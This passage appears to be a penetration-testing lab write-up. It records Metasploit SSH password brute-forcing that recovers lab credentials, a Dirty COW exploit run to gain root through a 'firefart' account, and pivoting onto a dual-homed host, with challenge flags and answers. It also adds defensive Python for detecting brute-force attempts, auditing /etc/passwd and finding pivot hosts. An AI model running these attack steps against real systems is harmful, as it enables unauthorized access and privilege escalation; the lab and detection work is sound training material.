39 post/windows/gather/enum_putty_saved_sessions normal No PuTTY Saved Sessions Enumeration Module
40 auxiliary/gather/qnap_lfi 2019-11-25 normal Yes QNAP QTS and Photo Station Local File Inclusion
41 exploit/linux/ssh/quantum_dxi_known_privkey 2014-03-17 excellent No Quantum DXi V1000 SSH Private Key Exposure
42 exploit/linux/ssh/quantum_vmpro_backdoor 2014-03-17 excellent No Quantum vmPRO Backdoor Command
43 auxiliary/fuzzers/ssh/ssh_version_15 normal No SSH 1.5 Version Fuzzer
44 auxiliary/fuzzers/ssh/ssh_version_2 normal No SSH 2.0 Version Fuzzer
45 auxiliary/fuzzers/ssh/ssh_kexinit_corrupt normal No SSH Key Exchange Init Corruption
46 post/linux/manage/sshkey_persistence excellent No SSH Key Persistence
47 post/windows/manage/sshkey_persistence good No SSH Key Persistence
48 auxiliary/scanner/ssh/ssh_login normal No SSH Login Check Scanner
49 auxiliary/scanner/ssh/ssh_identify_pubkeys normal No SSH Public Key Acceptance Scanner
50 auxiliary/scanner/ssh/ssh_login_pubkey normal No SSH Public Key Login Scanner
51 exploit/multi/ssh/sshexec 1999-01-01 manual No SSH User Code Execution
52 auxiliary/scanner/ssh/ssh_enumusers normal No SSH Username Enumeration
53 auxiliary/fuzzers/ssh/ssh_version_corrupt normal No SSH Version Corruption
54 auxiliary/scanner/ssh/ssh_version normal No SSH Version Scanner
55 post/multi/gather/saltstack_salt normal No SaltStack Salt Information Gatherer
56 exploit/unix/http/schneider_electric_net55xx_encoder 2019-01-25 excellent Yes Schneider Electric Pelco Endura NET55XX Encoder
57 exploit/windows/ssh/securecrt_ssh1 2002-07-23 average No SecureCRT SSH1 Buffer Overflow
58 exploit/linux/ssh/solarwinds_lem_exec 2017-03-17 excellent No SolarWinds LEM Default SSH Password Remote Code Execution
59 exploit/linux/http/sourcegraph_gitserver_sshcmd 2022-02-18 excellent Yes Sourcegraph gitserver sshCommand RCE
60 exploit/linux/ssh/symantec_smg_ssh 2012-08-27 excellent No Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability
61 exploit/linux/http/symantec_messaging_gateway_exec 2017-04-26 excellent No Symantec Messaging Gateway Remote Code Execution
62 exploit/windows/ssh/sysax_ssh_username 2012-02-27 normal Yes Sysax 5.53 SSH Username Buffer Overflow
63 auxiliary/dos/windows/ssh/sysax_sshd_kexchange 2013-03-17 normal No Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service
64 exploit/unix/ssh/tectia_passwd_changereq 2012-12-01 excellent Yes Tectia SSH USERAUTH Change Request Password Reset Vulnerability
65 auxiliary/scanner/ssh/ssh_enum_git_keys normal No Test SSH Github Access
66 exploit/linux/http/ubiquiti_airos_file_upload 2016-02-13 excellent No Ubiquiti airOS Arbitrary File Upload
67 payload/cmd/unix/reverse_ssh normal No Unix Command Shell, Reverse TCP SSH
68 exploit/linux/ssh/vmware_vdp_known_privkey 2016-12-20 excellent No VMware VDP Known SSH Key
69 exploit/multi/http/vmware_vcenter_uploadova_rce 2021-02-23 manual Yes VMware vCenter Server Unauthenticated OVA File Upload RCE
70 exploit/linux/ssh/vyos_restricted_shell_privesc 2018-11-05 great Yes VyOS restricted-shell Escape and Privilege Escalation
71 post/windows/gather/credentials/mremote normal No Windows Gather mRemote Saved Password Extraction
72 exploit/windows/local/unquoted_service_path 2001-10-25 excellent Yes Windows Unquoted Service Path Privilege Escalation
73 auxiliary/scanner/ssh/libssh_auth_bypass 2018-10-16 normal No libssh Authentication Bypass Scanner
74 exploit/linux/http/php_imap_open_rce 2018-10-23 good Yes php imap_open Remote Code Execution
Interact with a module by name or index. For example info 74, use 74 or use exploit/linux/http/php_imap_open_rce
msf6 >
The one of interest is number 48, ssh_login, which guesses ssh passwords:
msf6 > use 48
msf6 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ssh/ssh_login) > set user_file /home/kali/LPT_day2/Usernames-CPENT.txt
user_file => /home/kali/LPT_day2/Usernames-CPENT.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file /home/kali/LPT_day2/Passwords-CPENT.txt
pass_file => /home/kali/LPT_day2/Passwords-CPENT.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 172.16.65.210
rhosts => 172.16.65.210
msf6 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE /home/kali/LPT_day2/Passwords-CPENT.txt no File containing passwords, one per line
RHOSTS 172.16.65.210 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /home/kali/LPT_day2/Usernames-CPENT.txt no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 172.16.65.210:22 - Starting bruteforce
[+] 172.16.65.210:22 - Success: 'kevin:Pa$$w0rd123' 'uid=1001(kevin) gid=1002(kevin) groups=1002(kevin) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
Even when hydra cannot be used because of the key-exchange algorithm mismatch, the ssh password can still be brute-forced this way. Next, log in over ssh from the attacking machine with the recovered password:
┌──(root㉿kali)-[~]
└─# ssh kevin@172.16.65.210
The authenticity of host '172.16.65.210 (172.16.65.210)' can't be established.
RSA key fingerprint is SHA256:gnWJCcZ+plw28GbzYOxL6XuI/fgL9w7vLOisRb/1xfY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.16.65.210' (RSA) to the list of known hosts.
kevin@172.16.65.210's password:
Last login: Fri Dec 24 09:05:20 2021
kevin@owaspbwa:~$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
link/ether 00:15:5d:92:88:71 brd ff:ff:ff:ff:ff:ff
inet 172.16.65.210/16 brd 172.16.255.255 scope global eth0
inet6 fe80::215:5dff:fe92:8871/64 scope link
valid_lft forever preferred_lft forever
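Both brute-force runs above (hydra against .200 and ssh_login against .210) leave a very recognisable trail in the target's sshd log: a burst of "Failed password" lines from one source, then an "Accepted password" from the same source. As an added example (not part of the original write-up), the Python below implements a sliding-window detector over such lines. The log lines are constructed in syslog auth.log format and are not from the lab hosts; the threshold of 5 failures in 60 seconds, the 2023 year used to complete the syslog timestamps, and the source address 192.168.200.50 are assumptions of this example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd lines in syslog auth.log format (hypothetical sample, not
# taken from the lab hosts); 192.168.200.50 plays the password-guessing client.
SAMPLE_AUTH_LOG = """\
Mar 27 04:21:46 debian-9 sshd[1201]: Failed password for invalid user admin from 192.168.200.50 port 41022 ssh2
Mar 27 04:21:47 debian-9 sshd[1203]: Failed password for invalid user admin from 192.168.200.50 port 41024 ssh2
Mar 27 04:21:48 debian-9 sshd[1205]: Failed password for root from 192.168.200.50 port 41026 ssh2
Mar 27 04:21:49 debian-9 sshd[1207]: Failed password for root from 192.168.200.50 port 41028 ssh2
Mar 27 04:21:50 debian-9 sshd[1209]: Failed password for vagrant from 192.168.200.50 port 41030 ssh2
Mar 27 04:21:51 debian-9 sshd[1211]: Accepted password for vagrant from 192.168.200.50 port 41032 ssh2
Mar 27 04:30:00 debian-9 sshd[1300]: Failed password for vagrant from 172.16.0.1 port 50000 ssh2
Mar 27 04:30:05 debian-9 sshd[1302]: Accepted password for vagrant from 172.16.0.1 port 50002 ssh2
"""

LOG_RE = re.compile(
    r"^(\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+"
)


def detect_ssh_bruteforce(log_text, year=2023, threshold=5, window_s=60):
    """Sliding-window detector over sshd auth lines.

    Keeps the timestamps of recent failures per source address. Reaching
    `threshold` failures inside `window_s` seconds raises one "bruteforce"
    alert per burst; an accepted login from a source that still has a burst
    in its window raises "success_after_failures", the case that needs an
    immediate response (password reset, session review).
    """
    failures = defaultdict(deque)
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year; the caller supplies it
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        outcome, user, src = m.group(2), m.group(3), m.group(4)
        recent = failures[src]
        while recent and (ts - recent[0]).total_seconds() > window_s:
            recent.popleft()          # drop failures that fell out of the window
        if outcome == "Failed":
            recent.append(ts)
            if len(recent) == threshold:
                alerts.append({"time": ts.isoformat(), "src": src, "kind": "bruteforce",
                               "failures": len(recent), "user": None})
        elif len(recent) >= threshold:
            alerts.append({"time": ts.isoformat(), "src": src, "kind": "success_after_failures",
                           "failures": len(recent), "user": user})
    return alerts


if __name__ == "__main__":
    for alert in detect_ssh_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

The single failure from 172.16.0.1 followed by a success is the normal "typo then correct password" pattern and produces no alert, which is the point of keying the rule on a per-source burst rather than on any failure.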
With a shell, the userflag is easy to get:
kevin@owaspbwa:~$ cd /
kevin@owaspbwa:/$ find -name userflag.txt
^C
kevin@owaspbwa:/$ find / -name userflag.txt -print 2>/dev/null
/home/kevin/userflag.txt
kevin@owaspbwa:/$ md5sum /home/kevin/userflag.txt
9b34b4fd941661615d819a6c03e86047 /home/kevin/userflag.txt
kevin@owaspbwa:/$ cat /home/kevin/userflag.txt
BWAMachineUser-6534
11 (Challenge 50) What is the last 6 hex digits of the md5 hash content of rootflag.txt on 192.168.65.210? Ans: E86047
Next is privilege escalation. Running uname -a on this host shows a kernel that is probably vulnerable to Dirty COW; the exploit-db page is as follows:
What the PoC code does matters less than whether it can be compiled on the target:
kevin@owaspbwa:/tmp$ gcc
gcc: no input files
kevin@owaspbwa:/tmp$ vim dirty.c
kevin@owaspbwa:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
kevin@owaspbwa:/tmp$ ls -al
total 76
drwxrwxrwt 9 root root 4096 2021-12-24 12:12 .
drwxr-xr-x 23 root root 4096 2021-12-24 08:38 ..
-rw-r--r-- 1 kevin kevin 9156 2021-12-24 12:08 40847.cpp
-rwxr-xr-x 1 kevin kevin 12520 2021-12-24 12:12 dirty
-rw-r--r-- 1 kevin kevin 3713 2021-12-24 12:11 dirty.c
drwxr-xr-x 2 root root 4096 2021-12-24 08:38 hsperfdata_root
drwxrwxrwt 2 root root 4096 2021-12-24 08:38 .ICE-unix
-rw------- 1 www-data www-data 4 2021-12-24 08:38 mod_mono_dashboard_default_2
-rw------- 1 www-data www-data 4 2021-12-24 08:38 mod_mono_dashboard_XXGLOBAL_1
srwx------ 1 www-data www-data 0 2021-12-24 08:38 .mod_mono_server2
-rw------- 1 www-data www-data 0 2021-12-24 08:38 .mod_mono_server2_1920119561
drwxr-xr-x 3 root root 4096 2021-12-24 08:38 passenger.1.0.1391
drwxr-xr-x 2 root root 4096 2021-12-24 08:38 tomcat6-tmp
drwx------ 2 www-data www-data 4096 2021-12-24 08:38 .wapi
drwxr-xr-x 2 root root 4096 2021-12-24 08:38 .winbindd
drwxrwxrwt 2 root root 4096 2021-12-24 08:38 .X11-unix
kevin@owaspbwa:/tmp$ ./dirty 1234
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 1234
Complete line:
firefart:fionu3giiS71.:0:0:pwned:/root:/bin/bash
mmap: b7724000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '1234'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '1234'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
kevin@owaspbwa:/tmp$ su firefart
Password:
Added user firefart.
firefart@owaspbwa:/tmp# cd /
firefart@owaspbwa:/# find -name rootflag.txt -print 2>/dev/null
^C
firefart@owaspbwa:/# cd
firefart@owaspbwa:~# ls
rootflag.txt
firefart@owaspbwa:~# cat rootflag.txt
WebRoot-1976
firefart@owaspbwa:~# md5sum rootflag.txt
4690c3e3529cbc642e9caf33785d4a27 rootflag.txt
After a successful privilege escalation, the flag is obtained.
11 (Challenge 50) What is the last 6 hex digits of the md5 hash content of rootflag.txt on 192.168.65.210? Ans: 5D4A27
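The PoC output above shows exactly what this escalation leaves behind: a uid 0 account named firefart with a password hash in the /etc/passwd password field, a backup copy in /tmp/passwd.bak, and a root line that is no longer what it was. As an added example (not part of the original write-up), the Python below audits an /etc/passwd file for those artifacts and diffs it against a known-good baseline. Both passwd snapshots are constructed (the lab's real file is not shown); only the firefart line is taken from the PoC output above, and the baseline contents are assumptions of this example.

```python
# Constructed /etc/passwd snapshots (hypothetical; the lab's real file is not
# shown). BASELINE is a clean copy; CURRENT is the same file after the root
# line has been replaced by the entry the PoC printed above.
BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
kevin:x:1001:1002::/home/kevin:/bin/bash
"""

CURRENT_PASSWD = """\
firefart:fionu3giiS71.:0:0:pwned:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
kevin:x:1001:1002::/home/kevin:/bin/bash
"""

SHADOWED = {"x", "*", "!", ""}  # password-field values that carry no hash


def parse_passwd(text):
    """Map user name -> fields of one /etc/passwd entry (plus the raw line)."""
    entries = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            continue  # malformed line; a stricter audit would report it
        name, pw, uid, gid, gecos, home, shell = parts
        entries[name] = {"pw": pw, "uid": int(uid), "gid": int(gid), "gecos": gecos,
                         "home": home, "shell": shell, "raw": line}
    return entries


def audit_passwd(current_text, baseline_text=None):
    """Return (severity, user, message) findings for the current /etc/passwd."""
    current = parse_passwd(current_text)
    findings = []
    for name, e in current.items():
        if e["uid"] == 0 and name != "root":
            findings.append(("high", name, "uid 0 account that is not root"))
        if e["pw"] not in SHADOWED:
            findings.append(("high", name, "password hash stored in world-readable /etc/passwd"))
    if "root" not in current:
        findings.append(("high", "root", "root entry missing"))
    if baseline_text is not None:
        baseline = parse_passwd(baseline_text)
        for name in current.keys() - baseline.keys():
            findings.append(("medium", name, "entry not present in baseline"))
        for name in baseline.keys() - current.keys():
            if name != "root":  # the missing root entry is already reported above
                findings.append(("high", name, "entry present in baseline but missing now"))
        for name in current.keys() & baseline.keys():
            if current[name]["raw"] != baseline[name]["raw"]:
                findings.append(("medium", name, "entry differs from baseline"))
    return findings


if __name__ == "__main__":
    for severity, user, message in audit_passwd(CURRENT_PASSWD, BASELINE_PASSWD):
        print(f"[{severity}] {user}: {message}")
```

In practice the baseline is a snapshot taken at build time (or the hash of one, as file-integrity tools keep), and the check runs from a scheduled job or an agent; the uid 0 and hash-in-passwd rules work even without a baseline, which is why they are applied first.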
Pivoting
Log in to .200 over ssh again, this time using the Metasploit module:
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# msfconsole
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
.OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
.dOOo'WM.OOOOocccxOOOO.MX'xOOd.
,kOl'M.OOOOOOOOOOOOO.M'dOk,
:kk;.OOOOOOOOOOOOO.;Ok:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v6.3.2-dev ]
+ -- --=[ 2290 exploits - 1201 auxiliary - 409 post ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use the edit command to open the
currently active module in your editor
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search ssh_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssh/ssh_login normal No SSH Login Check Scanner
1 auxiliary/scanner/ssh/ssh_login_pubkey normal No SSH Public Key Login Scanner
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey
msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 172.16.65.200
rhosts => 172.16.65.200
msf6 auxiliary(scanner/ssh/ssh_login) > set username vagrant
username => vagrant
msf6 auxiliary(scanner/ssh/ssh_login) > set password vagrant
password => vagrant
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 172.16.65.200:22 - Starting bruteforce
[+] 172.16.65.200:22 - Success: 'vagrant:vagrant' 'uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),119(scanner) Linux debian-9 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64 GNU/Linux '
[*] SSH session 1 opened (192.168.200.4:40625 -> 172.16.65.200:22) at 2023-03-27 05:56:45 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > set user_file ""
user_file =>
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file ""
pass_file =>
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell linux SSH root @ 192.168.200.4:40625 -> 172.16.65.200:22 (172.16.65.200)
Log in with plain ssh as well; running ip addr shows that the host has two network interfaces:
┌──(root㉿kali)-[~]
└─# ssh vagrant@172.16.65.200
vagrant@172.16.65.200's password:
Linux debian-9 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Dec 23 18:29:18 2021 from 172.16.0.1
vagrant@debian-9:~$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s10f0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 00:15:5d:92:88:6f brd ff:ff:ff:ff:ff:ff
inet 172.16.65.200/16 brd 172.16.255.255 scope global enp0s10f0
valid_lft forever preferred_lft forever
inet6 fe80::215:5dff:fe92:886f/64 scope link
valid_lft forever preferred_lft forever
3: enp0s10f1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:15:5d:92:88:78 brd ff:ff:ff:ff:ff:ff
inet 192.168.5.200/24 brd 192.168.5.255 scope global enp0s10f1
valid_lft forever preferred_lft forever
inet6 fe80::7130:6e6c:8771:2bca/64 scope link
valid_lft forever preferred_lft forever
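The second interface (192.168.5.200/24) is what makes .200 a bridge between two networks. As an added example, not part of the original write-up, the Python below parses ip addr output like the listing above and reports which networks a host is attached to, the same check a defender would run over a host inventory to find dual-homed machines; the sample text is copied from the listing above and trimmed to the lines the parser needs.

```python
import ipaddress
import re

# Sample `ip addr` output taken from the transcript above (host 172.16.65.200),
# reduced to the interface and inet lines the parser uses.
SAMPLE_IP_ADDR = """\
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    inet 127.0.0.1/8 scope host lo
2: enp0s10f0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
    inet 172.16.65.200/16 brd 172.16.255.255 scope global enp0s10f0
3: enp0s10f1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    inet 192.168.5.200/24 brd 192.168.5.255 scope global enp0s10f1
"""

# "2: enp0s10f0: <...>" -> interface name; "    inet a.b.c.d/n ... scope global ..." -> address
IFACE_RE = re.compile(r"^\d+:\s+(?P<name>[^:@]+)[@:]")
INET_RE = re.compile(r"^\s+inet\s+(?P<cidr>\d+\.\d+\.\d+\.\d+/\d+)\s.*scope\s+(?P<scope>\S+)")


def parse_ip_addr(text):
    """Return {interface: [IPv4Interface, ...]} keeping only global-scope IPv4 addresses."""
    result = {}
    current = None
    for line in text.splitlines():
        m = IFACE_RE.match(line)
        if m:
            current = m.group("name").strip()
            result.setdefault(current, [])
            continue
        m = INET_RE.match(line)
        if m and current is not None and m.group("scope") == "global":
            result[current].append(ipaddress.ip_interface(m.group("cidr")))
    return result


def reachable_networks(text):
    """Sorted list of distinct IPv4 networks the host sits on (loopback excluded)."""
    nets = {str(addr.network) for addrs in parse_ip_addr(text).values() for addr in addrs}
    return sorted(nets)


def is_dual_homed(text):
    """True when the host bridges more than one network, i.e. it can act as a pivot."""
    return len(reachable_networks(text)) > 1


if __name__ == "__main__":
    print("attached networks:", reachable_networks(SAMPLE_IP_ADDR))
    print("dual-homed:", is_dual_homed(SAMPLE_IP_ADDR))
```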